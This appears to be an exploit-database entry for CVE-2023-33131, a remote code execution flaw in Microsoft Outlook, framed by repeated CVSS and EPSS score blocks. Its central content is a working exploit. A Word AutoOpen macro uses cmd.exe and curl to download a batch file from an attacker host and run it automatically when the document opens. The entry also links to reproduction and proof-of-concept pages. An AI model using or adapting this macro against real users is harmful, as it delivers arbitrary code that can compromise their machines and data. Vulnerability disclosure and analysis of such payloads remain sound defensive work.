8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.134 Low
EPSS
Percentile
95.5%
## Title: Microsoft Outlook Microsoft 365 MSO (Version 2306 Build 16.0.16529.20100) 32-bit - Remote Code Execution
## Author: nu11secur1ty
## Date: 07.07.2023
## Vendor: https://www.microsoft.com/
## Software: https://outlook.live.com/owa/
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-33131
## Description:
In this vulnerability, the Microsoft Outlook app allows an attacker to
send an infected Word file with malicious content
to everyone who using the Outlook app, no matter web or local.
Microsoft still doesn't have a patch against this 0-day vulnerability today.
## Staus: HIGH Vulnerability
[+]Exploit:
- The malicious Word file:
```js
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat >
nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus)
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131)
## Proof and Exploit
[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html)
## Time spend:
00:30:00
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
9 High
AI Score
Confidence
High
6.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:M/Au:N/C:P/I:P/A:P
0.134 Low
EPSS
Percentile
95.5%